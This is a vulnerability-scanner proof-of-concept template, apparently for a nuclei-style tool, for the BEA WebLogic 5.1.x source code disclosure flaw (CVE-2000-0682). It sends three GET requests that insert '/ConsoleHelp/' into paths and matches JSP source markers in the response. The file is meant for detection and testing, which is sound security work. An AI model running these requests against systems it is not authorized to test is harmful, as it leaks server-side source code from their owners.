[info]
author = "ave"
description = "通过向 BEA WebLogic 5.1.x 的 URL 中插入 /ConsoleHelp/ 路径，触发 FileServlet 返回 JSP/Servlet 等解析页面的原始源代码，验证目标是否存在源代码泄露漏洞。"
id = "POC-AVE-2000-0841"
name = "BEA WebLogic 源代码泄露漏洞 PoC"
severity = "medium"
tags = ["ave-2000-0841"]
vuln_id = [
    "CVE-2000-0682",
    "AVE-2000-0841",
]

[poc]
logic = "any"

[[poc.requests]]
method = "GET"
path = "/{{BaseURL}}/ConsoleHelp/index.jsp"
protocol = "http"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = [
    "<%",
    "<jsp:",
    "java.io",
    "pageContext",
    "getParameter",
]

[[poc.requests]]
method = "GET"
path = "/{{BaseURL}}/ConsoleHelp/"
protocol = "http"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = [
    "<%",
    "<jsp:",
    "java.io",
    "pageContext",
    "getParameter",
]

[[poc.requests]]
method = "GET"
path = "/{{BaseURL}}/index.jsp/ConsoleHelp/"
protocol = "http"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = [
    "<%",
    "<jsp:",
    "java.io",
    "pageContext",
    "getParameter",
]
